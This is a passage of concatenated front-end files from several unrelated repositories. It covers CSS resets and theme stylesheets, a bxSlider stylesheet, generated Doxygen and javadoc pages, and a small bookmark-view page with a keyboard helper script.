100%; /* 1 */ padding: 0; /* 3 */ white-space: normal; /* 1 */ } /** * 1. Add the correct display in IE 9-. * 2. Add the correct vertical alignment in Chrome, Firefox, and Opera. */ progress { display: inline-block; /* 1 */ vertical-align: baseline; /* 2 */ } /** * Remove the default vertical scrollbar in IE. */ textarea { overflow: auto; } /** * 1. Add the correct box sizing in IE 10-. * 2. Remove the padding in IE 10-. */ [type="checkbox"], [type="radio"] { box-sizing: border-box; /* 1 */ padding: 0; /* 2 */ } /** * Correct the cursor style of increment and decrement buttons in Chrome. */ [type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { height: auto; } /** * 1. Correct the odd appearance in Chrome and Safari. * 2. Correct the outline style in Safari. */ [type="search"] { -webkit-appearance: textfield; /* 1 */ outline-offset: -2px; /* 2 */ } /** * Remove the inner padding and cancel buttons in Chrome and Safari on OS X. */ [type="search"]::-webkit-search-cancel-button, [type="search"]::-webkit-search-decoration { -webkit-appearance: none; } /** * 1. Correct the inability to style clickable types in iOS and Safari. * 2. Change font properties to `inherit` in Safari. */ ::-webkit-file-upload-button { -webkit-appearance: button; /* 1 */ font: inherit; /* 2 */ } /* Interactive ========================================================================== */ /* * Add the correct display in IE 9-. * 1. Add the correct display in Edge, IE, and Firefox. */ details, menu { display: block; } /* * Add the correct display in all browsers. */ summary { display: list-item; } /* Scripting ========================================================================== */ /** * Add the correct display in IE 9-. */ canvas { display: inline-block; } /** * Add the correct display in IE. */ template { display: none; } /* Hidden ========================================================================== */ /** * Add the correct display in IE 10-. */ [hidden] { display: none; } /* * SETTINGS */ body { font-size: 0.875em; line-height: 1.428571429; color: #000; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } abbr[title] { cursor: help; border-bottom: 1px dotted #000; text-decoration: none; } address { font-style: normal; } blockquote { font-size: 16px; font-weight: 300; } button, input, optgroup, select, textarea { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } mark { background-color: #f7ccd5; } h1, h2, h3, h4, h5, h6 { color: #000; } p { margin: 0.8571428572em 0; } dl dt { font-weight: 700; } dl dd { margin: 0; } ::-moz-selection { background-color: #f7ccd5; } ::selection { background-color: #f7ccd5; } a { color: #d5002b; text-decoration: underline; } a:hover, a:focus { text-decoration: underline; } a:focus { outline: none; } .is-keyboarduser a:focus { outline: 2px dotted #000; outline-offset: 0.5rem; } label { display: inline-block; margin-bottom: 6px; } @media print { * { text-shadow: none !important; color: #000 !important; background: #fff !important; box-shadow: none !important; border-color: #000 !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; padding: 6px; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } p a { word-wrap: break-word; } select { background: #fff !important; } .container, .container-fluid { margin: auto; width: auto; } } /*!accessibility-helpers v2.0.1 WBG*/ /* * accessibility-helper mixins * */ /* * SETTINGS */ .sr-only { position: absolute; height: 1px; width: 1px; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); } .sr-skiplink { position: absolute; width: 1px; height: 1px; margin: -1px; padding: 0; overflow: hidden; clip: rect(0, 0, 0, 0); border: 0; font-size: 21px; } .sr-skiplink:active, .sr-skiplink:focus { position: fixed; top: 0; right: 0; left: 0; height: auto; width: auto; margin: 0; padding: 21px; overflow: visible; clip: auto; text-align: center; z-index: 100; background-color: #fff; }
askmath/static/process/noapplet/PublishedBookmarks.html
saraivaufc/askMathPlus
<!-- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> --> <html lang="pt" xml:lang="pt" xmlns:fo="http://www.w3.org/1999/XSL/Format"> <head> <META http-equiv="Content-Type" content="text/html; charset=utf-8"> <style type="text/css"> body { background-color: #ffffff; font-family: arial, helvetica, sans-serif; font-size: 10pt; margin-left: 0px; margin-right: 0px; margin-top: 0px; margin-bottom: 0px; text-decoration: none; } td.menu { background:#006699; } span.menu { cursor : hand; font-size: 8pt; color: #ffffff; white-space:nowrap; padding-right: 0.5em; border-right: 2px solid #ffffff; } span.menu img { vertical-align: middle; } td.tab { background:#ffffff; padding-top: 1px; padding-bottom: 1px; } span.tab, span.selectedTab { cursor: pointer; font-size: 10pt; white-space:nowrap; line-height: 1.4em; } span.tab { background:#c0c0c0; border-top: 1px solid #666666; border-right: 1px solid #666666; border-left: 1px solid #666666; } span.selectedTab { background:#e0e0e0; border-top: 1px solid #a0a0a0; border-right: 1px solid #a0a0a0; border-left: 1px solid #a0a0a0; } td.tree { border-top: 1px solid #999999; } </style> <script type="text/javascript" src="bookmarkviews.js"></script><script> function checkKey(e, func) { if (window.event) { key = window.event.keyCode; target = window.event.srcElement; } else if (e) { key = e.which; target = e.target; } if (key==13 || key==32) { func(target); } } </script> </head> <body marginheight="0" marginwidth="0" onload="init();"> <table cellspacing="1px" cellpadding="0px" border="0" height="100%" width="100%"> <tr> <td class="menu"> <span class="menu" tabindex="1" onclick="whereAmI();" onkeypress="checkKey(event, whereAmI);"><img alt="" title="" src="images/ni_where.gif">Where am I</span> <span class="menu" tabindex="1" onclick="togViews();" onkeypress="checkKey(event, togViews);"><img alt="" title="" src="images/action_unhide.gif">Tree Sets</span> </td> </tr> <tr> <td class="tab"> <span class="tab" id="tab0" tabindex="1" onkeypress="checkKey(event, displayTree);" onclick="displayTree(this);" url="Processo de Entrega - Geanny_FBF8542F.html" isDefaultView="true">&nbsp;Processo de Entrega - SIGEA&nbsp;</span> </td> </tr> <tr height="100%"> <td class="tree"> <iframe name="ory_toc" title="" style="visibility:visible" tabindex="1" frameborder="no" width="100%" height="100%" scrolling="auto"></iframe> </td> </tr> </table> </body> </html>
doc/doxygen/html/search/functions_1.html
ibrohimislam/calculator-oop
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta name="generator" content="Doxygen 1.8.9.1"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="functions_1.js"></script> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Memuat...</div> <div id="SRResults"></div> <script type="text/javascript"><!-- createResults(); --></script> <div class="SRStatus" id="Searching">Mencari...</div> <div class="SRStatus" id="NoMatches">Tidak Ditemukan</div> <script type="text/javascript"><!-- document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); --></script> </div> </body> </html>
wp-content/themes/momentum/script/menu/superfish.css
ajyn17/wp-khouse
/*** ESSENTIAL STYLES ***/ .sf-menu, .sf-menu * { list-style: none; } .sf-menu { line-height: 1.0; } .sf-menu ul { position: absolute; top: -999em; width: 10em; /* left offset of submenus need to match (see below) */ } .sf-menu ul li { width: 100%; } .sf-menu li:hover { visibility: inherit; /* fixes IE7 'sticky bug' */ } .sf-menu li { float: left; position: relative; } .sf-menu a { display: block; position: relative; } .sf-menu li:hover ul, .sf-menu li.sfHover ul { left: 0; top: 2.5em; /* match top ul list item height */ z-index: 99; } ul.sf-menu li:hover li ul, ul.sf-menu li.sfHover li ul { top: -999em; } ul.sf-menu li li:hover ul, ul.sf-menu li li.sfHover ul { left: 13.5em; /* match ul width */ top: 0; } ul.sf-menu li li:hover li ul, ul.sf-menu li li.sfHover li ul { top: -999em; } ul.sf-menu li li li:hover ul, ul.sf-menu li li li.sfHover ul { left: 10em; /* match ul width */ top: 0; } /*** DEMO SKIN ***/ .sf-menu { float: left; } .sf-menu a { padding: .75em 1em; text-decoration:none; } .sf-menu a, .sf-menu a:visited { /* visited pseudo selector so IE6 applies text colour*/ } .sf-menu li { } .sf-menu li li { float: left; width: 185px; margin: 0; } .sub-menu li{} .sub-menu li a{ padding: 13px 0!important; width: 135px; margin: 0 25px; background: none!important; color: #fff; font-size: 13px!important; } .sub-menu-last a{border:none!important;} .sub-menu-last ul li a{ border-bottom: 1px solid #e9e8e8!important; padding: 0.7em 0; width: 94%; } .sub-menu-last ul li a.sub-sub-menu-last{border-bottom:0px solid #fff!important;} .sf-menu li li li {} .sf-menu li:hover, .sf-menu li.sfHover, .sf-menu a:focus, .sf-menu a:hover, .sf-menu a:active { outline: 0; } .sub-menu a:hover{ color:#DD2C2C; outline: 0; background: none!important; } .sub-menu li:hover{} /*** arrows **/ .sf-menu a.sf-with-ul { min-width: 1px; /* trigger IE7 hasLayout so spans position accurately */ } .sf-sub-indicator { position: absolute; display: block; right: .75em; top: 1.05em; /* IE6 only */ width: 10px; height: 10px; text-indent: -999em; overflow: hidden; } a > .sf-sub-indicator { /* give all except IE6 the correct values */ top: .8em; background-position: 0 -100px; /* use translucent arrow for modern browsers*/ } /* apply hovers to modern browsers */ a:focus > .sf-sub-indicator, a:hover > .sf-sub-indicator, a:active > .sf-sub-indicator, li:hover > a > .sf-sub-indicator, li.sfHover > a > .sf-sub-indicator { background-position: -10px -100px; /* arrow hovers for modern browsers*/ } /* point right for anchors in subs */ .sf-menu ul .sf-sub-indicator { background-position: -10px 0; } .sf-menu ul a > .sf-sub-indicator { background-position: 0 0; } /* apply hovers to modern browsers */ .sf-menu ul a:focus > .sf-sub-indicator, .sf-menu ul a:hover > .sf-sub-indicator, .sf-menu ul a:active > .sf-sub-indicator, .sf-menu ul li:hover > a > .sf-sub-indicator, .sf-menu ul li.sfHover > a > .sf-sub-indicator { background-position: -10px 0; /* arrow hovers for modern browsers*/ } /*** shadows for all but IE6 ***/ .sf-shadow ul { margin: -20px 0 0 -26px; width: 185px; padding: 17px 0 8px; background: #292b30 url("img/black-opacity.png") repeat-x left bottom; } .sf-shadow ul.sf-shadow-off { background: transparent; } .sub-menu .sub-menu { padding:5px 0 8px 0; margin:-5px 0 0 -25px; } .sub-menu .sub-menu .sub-menu { padding:5px 0 8px 0; margin:-5px 0 0 31px; }
public/styles.css
alexbeeken/Deadpoets_site
body { padding-top: 100px; background-image: url('/img/wood.jpg'); } h1 { font-family: 'alien_encounters_solidregular'; } h2 { font-family: 'djb_carly_sue_got_marriedRg'; } h3 { font-family: 'alien_encountersbold_italic'; font-size: 2em; } h5 { font-family: 'alien_encounters_solidregular'; } .jumbotron { margin-bottom: 0px; background-image: url(../img/beer.jpg); background-position: 0% 25%; background-size: cover; background-repeat: no-repeat; color: white; text-shadow: black 0.3em 0.3em 0.3em; } .jumbotron table { background-color: black; } .jumbotron input { color: black; } @font-face { font-family: 'bombingregular'; src: url('bombing-webfont.eot'); src: url('bombing-webfont.eot?#iefix') format('embedded-opentype'), url('bombing-webfont.woff2') format('woff2'), url('bombing-webfont.woff') format('woff'), url('bombing-webfont.ttf') format('truetype'), url('bombing-webfont.svg#bombingregular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'abduction2002regular'; src: url('abduction2002-webfont.eot'); src: url('abduction2002-webfont.eot?#iefix') format('embedded-opentype'), url('abduction2002-webfont.woff2') format('woff2'), url('abduction2002-webfont.woff') format('woff'), url('abduction2002-webfont.ttf') format('truetype'), url('abduction2002-webfont.svg#abduction2002regular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encounters_solidbold'; src: url('alien-encounters-solid-bold-webfont.eot'); src: url('alien-encounters-solid-bold-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-solid-bold-webfont.woff2') format('woff2'), url('alien-encounters-solid-bold-webfont.woff') format('woff'), url('alien-encounters-solid-bold-webfont.ttf') format('truetype'), url('alien-encounters-solid-bold-webfont.svg#alien_encounters_solidbold') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encounters_solidregular'; src: url('alien-encounters-solid-regular-webfont.eot'); src: url('alien-encounters-solid-regular-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-solid-regular-webfont.woff2') format('woff2'), url('alien-encounters-solid-regular-webfont.woff') format('woff'), url('alien-encounters-solid-regular-webfont.ttf') format('truetype'), url('alien-encounters-solid-regular-webfont.svg#alien_encounters_solidregular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encounters_soliditalic'; src: url('alien-encounters-solid-italic-webfont.eot'); src: url('alien-encounters-solid-italic-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-solid-italic-webfont.woff2') format('woff2'), url('alien-encounters-solid-italic-webfont.woff') format('woff'), url('alien-encounters-solid-italic-webfont.ttf') format('truetype'), url('alien-encounters-solid-italic-webfont.svg#alien_encounters_soliditalic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encountersbold'; src: url('alien-encounters-bold-webfont.eot'); src: url('alien-encounters-bold-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-bold-webfont.woff2') format('woff2'), url('alien-encounters-bold-webfont.woff') format('woff'), url('alien-encounters-bold-webfont.ttf') format('truetype'), url('alien-encounters-bold-webfont.svg#alien_encountersbold') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encountersbold_italic'; src: url('alien-encounters-bold-italic-webfont.eot'); src: url('alien-encounters-bold-italic-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-bold-italic-webfont.woff2') format('woff2'), url('alien-encounters-bold-italic-webfont.woff') format('woff'), url('alien-encounters-bold-italic-webfont.ttf') format('truetype'), url('alien-encounters-bold-italic-webfont.svg#alien_encountersbold_italic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encountersregular'; src: url('alien-encounters-regular-webfont.eot'); src: url('alien-encounters-regular-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-regular-webfont.woff2') format('woff2'), url('alien-encounters-regular-webfont.woff') format('woff'), url('alien-encounters-regular-webfont.ttf') format('truetype'), url('alien-encounters-regular-webfont.svg#alien_encountersregular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'alien_encountersitalic'; src: url('alien-encounters-italic-webfont.eot'); src: url('alien-encounters-italic-webfont.eot?#iefix') format('embedded-opentype'), url('alien-encounters-italic-webfont.woff2') format('woff2'), url('alien-encounters-italic-webfont.woff') format('woff'), url('alien-encounters-italic-webfont.ttf') format('truetype'), url('alien-encounters-italic-webfont.svg#alien_encountersitalic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'djb_miss_molly_brownregular'; src: url('djb_miss_molly_brown-webfont.eot'); src: url('djb_miss_molly_brown-webfont.eot?#iefix') format('embedded-opentype'), url('djb_miss_molly_brown-webfont.woff2') format('woff2'), url('djb_miss_molly_brown-webfont.woff') format('woff'), url('djb_miss_molly_brown-webfont.ttf') format('truetype'), url('djb_miss_molly_brown-webfont.svg#djb_miss_molly_brownregular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'djb_carly_sue_got_marriedRg'; src: url('djb_carly_sue_got_married-webfont.eot'); src: url('djb_carly_sue_got_married-webfont.eot?#iefix') format('embedded-opentype'), url('djb_carly_sue_got_married-webfont.woff2') format('woff2'), url('djb_carly_sue_got_married-webfont.woff') format('woff'), url('djb_carly_sue_got_married-webfont.ttf') format('truetype'), url('djb_carly_sue_got_married-webfont.svg#djb_carly_sue_got_marriedRg') format('svg'); font-weight: normal; font-style: normal;
catkin_ws/Reports/BOLD_SIFT_1CAN-10fold-10%/whiteboard_brush/whiteboard_brush1.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>whiteboard_brush1</h1> <p>1/1 correct and 0/1false</p><br> <img src = "../../../BVD_M01/whiteboard_brush/whiteboard_brush1.jpg" alt = "whiteboard_brush1.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> </html>
docs/api_docs/server-Netty版/net/openmob/mobileimsdk/server/protocal/s/package-tree.html
suxinde2009/MobileIMSDK
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_18) on Wed Jan 03 16:37:29 CST 2018 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> net.openmob.mobileimsdk.server.protocal.s 类分层结构 (MobileIMSDK 3.2(Server端-Netty版) API文档) </TITLE> <META NAME="date" CONTENT="2018-01-03"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="net.openmob.mobileimsdk.server.protocal.s 类分层结构 (MobileIMSDK 3.2(Server端-Netty版) API文档)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="跳过导航链接"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>概述</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>软件包</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">类</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">使用</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>树</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>已过时</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>索引</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>帮助</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> <b>MobileIMSDK4Server-netty 3.2(build 2018/01/03)</b></EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../../net/openmob/mobileimsdk/server/protocal/c/package-tree.html"><B>上一个</B></A>&nbsp; &nbsp;<A HREF="../../../../../../net/openmob/mobileimsdk/server/qos/package-tree.html"><B>下一个</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?net/openmob/mobileimsdk/server/protocal/s/package-tree.html" target="_top"><B>框架</B></A> &nbsp; &nbsp;<A HREF="package-tree.html" target="_top"><B>无框架</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> 软件包 net.openmob.mobileimsdk.server.protocal.s 的分层结构 </H2> </CENTER> <DL> <DT><B>软件包分层结构:</B><DD><A HREF="../../../../../../overview-tree.html">所有软件包</A></DL> <HR> <H2> 类分层结构 </H2> <UL> <LI TYPE="circle">java.lang.Object<UL> <LI TYPE="circle">net.openmob.mobileimsdk.server.protocal.s.<A HREF="../../../../../../net/openmob/mobileimsdk/server/protocal/s/PErrorResponse.html" title="net.openmob.mobileimsdk.server.protocal.s 中的类"><B>PErrorResponse</B></A><LI TYPE="circle">net.openmob.mobileimsdk.server.protocal.s.<A HREF="../../../../../../net/openmob/mobileimsdk/server/protocal/s/PKeepAliveResponse.html" title="net.openmob.mobileimsdk.server.protocal.s 中的类"><B>PKeepAliveResponse</B></A><LI TYPE="circle">net.openmob.mobileimsdk.server.protocal.s.<A HREF="../../../../../../net/openmob/mobileimsdk/server/protocal/s/PLoginInfoResponse.html" title="net.openmob.mobileimsdk.server.protocal.s 中的类"><B>PLoginInfoResponse</B></A></UL> </UL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="跳过导航链接"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>概述</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>软件包</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">类</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">使用</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>树</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>已过时</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>索引</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>帮助</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> <b>MobileIMSDK4Server-netty 3.2(build 2018/01/03)</b></EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../../net/openmob/mobileimsdk/server/protocal/c/package-tree.html"><B>上一个</B></A>&nbsp; &nbsp;<A HREF="../../../../../../net/openmob/mobileimsdk/server/qos/package-tree.html"><B>下一个</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?net/openmob/mobileimsdk/server/protocal/s/package-tree.html" target="_top"><B>框架</B></A> &nbsp; &nbsp;<A HREF="package-tree.html" target="_top"><B>无框架</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <center>Copyright &copy; 2018 <a target=_blank href=http://www.52im.net>即时通讯网(52im.net) - 即时通讯技术社区</a>. All rights reserved.</center> </BODY> </HTML>
public/css/style.css
ropsiu/standup_timer
body,body.green{background-color:#0a0;color: #ddd;} body.red{background-color:#a00;color: #ddd;} body.orange{background-color:#c40;color: #ddd;} body.yellow{background-color:#990;color: #ddd;} #content{margin-top:15%;font-size: 20em;font-weight:bolder;}
wp-content/themes/beatsbydre/app/assets/frontend/css/vendor/jquery.bxslider.css
chumachkin/beatsbydre
/** * BxSlider v4.1.2 - Fully loaded, responsive content slider * http://bxslider.com * * Written by: Steven Wanderski, 2014 * http://stevenwanderski.com * (while drinking Belgian ales and listening to jazz) * * CEO and founder of bxCreative, LTD * http://bxcreative.com */ /** RESET AND LAYOUT ===================================*/ .bx-wrapper { position: relative; margin: 0 auto 60px; padding: 0; *zoom: 1; } .bx-wrapper img { max-width: 100%; display: block; } /** THEME ===================================*/ .bx-wrapper .bx-viewport { -moz-box-shadow: 0 0 5px #ccc; -webkit-box-shadow: 0 0 5px #ccc; box-shadow: 0 0 5px #ccc; border: 5px solid #fff; left: -5px; background: #fff; /*fix other elements on the page moving (on Chrome)*/ -webkit-transform: translatez(0); -moz-transform: translatez(0); -ms-transform: translatez(0); -o-transform: translatez(0); transform: translatez(0); } .bx-wrapper .bx-pager, .bx-wrapper .bx-controls-auto { position: absolute; bottom: -30px; width: 100%; } /* LOADER */ .bx-wrapper .bx-loading { min-height: 50px; background: url(../../img/bx_loader.gif) center center no-repeat #fff; height: 100%; width: 100%; position: absolute; top: 0; left: 0; z-index: 2000; } /* PAGER */ .bx-wrapper .bx-pager { text-align: center; font-size: .85em; font-family: Arial; font-weight: bold; color: #666; padding-top: 20px; } .bx-wrapper .bx-pager .bx-pager-item, .bx-wrapper .bx-controls-auto .bx-controls-auto-item { display: inline-block; *zoom: 1; *display: inline; } .bx-wrapper .bx-pager.bx-default-pager a { background: #666; text-indent: -9999px; display: block; width: 10px; height: 10px; margin: 0 5px; outline: 0; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; } .bx-wrapper .bx-pager.bx-default-pager a:hover, .bx-wrapper .bx-pager.bx-default-pager a.active { background: #000; } /* DIRECTION CONTROLS (NEXT / PREV) */ .bx-wrapper .bx-prev { left: 10px; background: url(../img/controls.png) no-repeat 0 -32px; } .bx-wrapper .bx-next { right: 10px; background: url(../img/controls.png) no-repeat -43px -32px; } .bx-wrapper .bx-prev:hover { background-position: 0 0; } .bx-wrapper .bx-next:hover { background-position: -43px 0; } .bx-wrapper .bx-controls-direction a { position: absolute; top: 50%; margin-top: -16px; outline: 0; width: 32px; height: 32px; text-indent: -9999px; z-index: 9999; } .bx-wrapper .bx-controls-direction a.disabled { display: none; } /* AUTO CONTROLS (START / STOP) */ .bx-wrapper .bx-controls-auto { text-align: center; } .bx-wrapper .bx-controls-auto .bx-start { display: block; text-indent: -9999px; width: 10px; height: 11px; outline: 0; background: url(../img/controls.png) -86px -11px no-repeat; margin: 0 3px; } .bx-wrapper .bx-controls-auto .bx-start:hover, .bx-wrapper .bx-controls-auto .bx-start.active { background-position: -86px 0; } .bx-wrapper .bx-controls-auto .bx-stop { display: block; text-indent: -9999px; width: 9px; height: 11px; outline: 0; background: url(../img/controls.png) -86px -44px no-repeat; margin: 0 3px; } .bx-wrapper .bx-controls-auto .bx-stop:hover, .bx-wrapper .bx-controls-auto .bx-stop.active { background-position: -86px -33px; } /* PAGER WITH AUTO-CONTROLS HYBRID LAYOUT */ .bx-wrapper .bx-controls.bx-has-controls-auto.bx-has-pager .bx-pager { text-align: left; width: 80%; } .bx-wrapper .bx-controls.bx-has-controls-auto.bx-has-pager .bx-controls-auto { right: 0; width: 35px; } /* IMAGE CAPTIONS */ .bx-wrapper .bx-caption { position: absolute; bottom: 0; left: 0; background: #666\9; background: rgba(80, 80, 80, 0.75); width: 100%; } .bx-wrapper .bx-caption span { color: #fff; font-family: Arial; display: block; font-size: .85em; padding: 10px; }
docs/api/org/apache/nutch/urlfilter/suffix/package-summary.html
tyolab/tyobot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_23) on Fri Sep 21 15:53:23 BST 2012 --> <TITLE> org.apache.nutch.urlfilter.suffix (apache-nutch 2.1 API) </TITLE> <META NAME="date" CONTENT="2012-09-21"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.apache.nutch.urlfilter.suffix (apache-nutch 2.1 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 